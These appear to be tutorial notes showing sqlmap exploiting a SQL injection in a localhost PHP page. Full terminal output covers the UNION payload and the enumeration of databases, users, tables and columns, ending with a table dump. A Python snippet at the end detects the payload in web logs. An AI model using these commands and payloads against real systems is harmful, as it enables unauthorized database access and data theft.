sqlmap notes
sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" GET
_
___ ___| |_____ ___ ___ {1.0.7.0#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:18:27
[01:18:27] [INFO] resuming back-end DBMS 'mysql'
[01:18:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:18:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:18:27] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:18:27
wangleileideMacBook-Air:sqltest wangleilei$
Enumerate the databases
sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --dbs
[*] starting at 01:22:52
[01:22:52] [INFO] resuming back-end DBMS 'mysql'
[01:22:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:22:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:22:52] [INFO] fetching database names
[01:22:52] [INFO] the SQL query used returns 8 entries
[01:22:52] [INFO] resumed: information_schema
[01:22:52] [INFO] resumed: BYSJ
[01:22:52] [INFO] resumed: YGGL
[01:22:52] [INFO] resumed: ctz
[01:22:52] [INFO] resumed: mysql
[01:22:52] [INFO] resumed: new_schema
[01:22:52] [INFO] resumed: performance_schema
[01:22:52] [INFO] resumed: sys
available databases [8]:
[*] BYSJ
[*] ctz
[*] information_schema
[*] mysql
[*] new_schema
[*] performance_schema
[*] sys
[*] YGGL
[01:22:52] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:22:52
It found 8 databases, which is quite alarming. Next, let's see which database the vulnerable page is using.
sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --current-db
[*] starting at 01:25:15
[01:25:15] [INFO] resuming back-end DBMS 'mysql'
[01:25:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:25:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:25:16] [INFO] fetching current database
current database: 'ctz'
[01:25:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:25:16
The current database is clearly ctz. Next, let's look at the current user.
sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" --users
[*] starting at 01:28:02
[01:28:02] [INFO] resuming back-end DBMS 'mysql'
[01:28:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:28:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:28:02] [INFO] fetching database users
[01:28:02] [INFO] the SQL query used returns 29 entries
database management system users [2]:
[*] 'mysql.sys'@'localhost'
[*] 'root'@'localhost'
[01:28:02] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:28:02
We can see the user is root.
List all tables in the current database
sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz --tables
[*] starting at 01:40:11
[01:40:11] [INFO] resuming back-end DBMS 'mysql'
[01:40:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:40:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:40:11] [INFO] fetching tables for database: 'ctz'
[01:40:11] [INFO] the SQL query used returns 13 entries
[01:40:11] [INFO] resumed: article
[01:40:11] [INFO] resumed: ys_admin
[01:40:11] [INFO] resumed: ys_cs
[01:40:11] [INFO] resumed: ys_gmjl
[01:40:11] [INFO] resumed: ys_huifu
[01:40:11] [INFO] resumed: ys_rwcs
[01:40:11] [INFO] resumed: ys_rwlb
[01:40:11] [INFO] resumed: ys_txjl
[01:40:11] [INFO] resumed: ys_users
[01:40:11] [INFO] resumed: ys_wxcd
[01:40:11] [INFO] resumed: ys_xtcs
[01:40:11] [INFO] resumed: ys_yjjl
[01:40:11] [INFO] resumed: ys_zjmx
Database: ctz
[13 tables]
+----------+
| article |
| ys_admin |
| ys_cs |
| ys_gmjl |
| ys_huifu |
| ys_rwcs |
| ys_rwlb |
| ys_txjl |
| ys_users |
| ys_wxcd |
| ys_xtcs |
| ys_yjjl |
| ys_zjmx |
+----------+
[01:40:11] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:40:11
List all columns of any one of the tables found above (using ys_rwcs as the example)
sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs --columns
[*] starting at 01:43:19
[01:43:20] [INFO] resuming back-end DBMS 'mysql'
[01:43:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:43:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:43:20] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:43:20] [INFO] the SQL query used returns 8 entries
[01:43:20] [INFO] resumed: "id","int(11)"
[01:43:20] [INFO] resumed: "kqzt","int(11)"
[01:43:20] [INFO] resumed: "scyxsj","int(11)"
[01:43:20] [INFO] resumed: "scid","int(11)"
[01:43:20] [INFO] resumed: "sckjjg","varchar(255)"
[01:43:20] [INFO] resumed: "dqid","int(11)"
[01:43:20] [INFO] resumed: "xtcjsj","int(11)"
[01:43:20] [INFO] resumed: "kjdj","int(11)"
Database: ctz
Table: ys_rwcs
[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| dqid | int(11) |
| id | int(11) |
| kjdj | int(11) |
| kqzt | int(11) |
| scid | int(11) |
| sckjjg | varchar(255) |
| scyxsj | int(11) |
| xtcjsj | int(11) |
+--------+--------------+
[01:43:20] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:43:20
Dump the column contents (sqlmap expects the column list after -C; the command below omits that flag, so the run dumps every column of the table, as the output shows)
sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump
wangleileideMacBook-Air:sqltest wangleilei$ sqlmap -u "http://localhost/sqltest/showart.php?id=34" -D ctz -T ys_rwcs "email,name,openid" --dump
[*] starting at 01:48:16
[01:48:16] [INFO] resuming back-end DBMS 'mysql'
[01:48:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: UNION query
Title: MySQL UNION query (48) - 3 columns
Payload: id=34' UNION ALL SELECT 48,CONCAT(0x7170707871,0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42,0x71786a6b71),48#
---
[01:48:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.36, Apache 2.4.18
back-end DBMS: MySQL 5
[01:48:16] [INFO] fetching columns for table 'ys_rwcs' in database 'ctz'
[01:48:16] [INFO] the SQL query used returns 8 entries
[01:48:16] [INFO] resumed: "id","int(11)"
[01:48:16] [INFO] resumed: "kqzt","int(11)"
[01:48:16] [INFO] resumed: "scyxsj","int(11)"
[01:48:16] [INFO] resumed: "scid","int(11)"
[01:48:16] [INFO] resumed: "sckjjg","varchar(255)"
[01:48:16] [INFO] resumed: "dqid","int(11)"
[01:48:16] [INFO] resumed: "xtcjsj","int(11)"
[01:48:16] [INFO] resumed: "kjdj","int(11)"
[01:48:16] [INFO] fetching entries for table 'ys_rwcs' in database 'ctz'
[01:48:16] [WARNING] reflective value(s) found and filtering out
[01:48:16] [INFO] the SQL query used returns 1 entries
[01:48:16] [INFO] retrieved: "5940","1","1","0","5939"," ","1488499312","1487...
[01:48:16] [INFO] analyzing table dump for possible password hashes
Database: ctz
Table: ys_rwcs
[1 entry]
+----+------+------+------+------+------------+--------+------------+
| id | dqid | scid | kjdj | kqzt | scyxsj | sckjjg | xtcjsj |
+----+------+------+------+------+------------+--------+------------+
| 1 | 5940 | 5939 | 1 | 0 | 1488499312 | NULL | 1487741441 |
+----+------+------+------+------+------------+--------+------------+
[01:48:16] [INFO] table 'ctz.ys_rwcs' dumped to CSV file '/Users/wangleilei/.sqlmap/output/localhost/dump/ctz/ys_rwcs.csv'
[01:48:16] [INFO] fetched data logged to text files under '/Users/wangleilei/.sqlmap/output/localhost'
[*] shutting down at 01:48:16
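As an added example that is not part of the original notes: the UNION payload sqlmap resumed in every run above carries its result delimiters and a verification string as MySQL hex literals, so a defender reading web-server logs can recognise this enumeration by decoding them. The Python below does that over constructed Apache access-log lines (the first line carries the exact payload from the runs above, URL-encoded as it would appear on the wire); the sqlmap/... User-Agent string is its default when no UA option is set.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format). Line 0 carries the
# payload from the sqlmap runs above; line 1 is a normal request for comparison.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Mar/2017:01:22:52 +0800] "GET /sqltest/showart.php?id=34%27%20UNION%20ALL%20SELECT%2048%2CCONCAT%280x7170707871%2C0x7866466e4b7944666c594d76596d6c5454466e7374554a684c7951754f654d466468796143444b42%2C0x71786a6b71%29%2C48%23 HTTP/1.1" 200 1532 "-" "sqlmap/1.0.7.0#dev (http://sqlmap.org)"',
    '127.0.0.1 - - [01/Mar/2017:01:23:10 +0800] "GET /sqltest/showart.php?id=34 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
UNION_SELECT = re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def decode_hex_literals(sql):
    """Return the ASCII text of every 0x... string literal in a SQL fragment."""
    out = []
    for h in HEX_LITERAL.findall(sql):
        if len(h) % 2:          # odd-length hex cannot be a byte string
            continue
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def is_sqlmap_marker(s):
    """sqlmap wraps the value it extracts in 5-letter delimiters shaped 'qXXXq'."""
    return len(s) == 5 and s[0] == "q" and s[-1] == "q" and s.isalpha()


def analyze_log_line(line):
    """Decode the request's query string and report injection indicators."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    path = m.group(1)
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    literals = decode_hex_literals(query)
    return {
        "union_select": bool(UNION_SELECT.search(query)),
        "hex_literals": literals,
        "sqlmap_markers": [s for s in literals if is_sqlmap_marker(s)],
        "sqlmap_user_agent": "sqlmap/" in line,
    }


def flagged(lines):
    """Indexes of lines that show sqlmap-style markers or sqlmap's User-Agent."""
    hits = []
    for i, line in enumerate(lines):
        r = analyze_log_line(line)
        if r and (r["sqlmap_markers"] or r["sqlmap_user_agent"]):
            hits.append(i)
    return hits
```

Seeing the delimiter pair around a long random string in CONCAT() is a stronger signal than the User-Agent alone, since the UA is trivially changed while the delimiters are how sqlmap finds its result in the page.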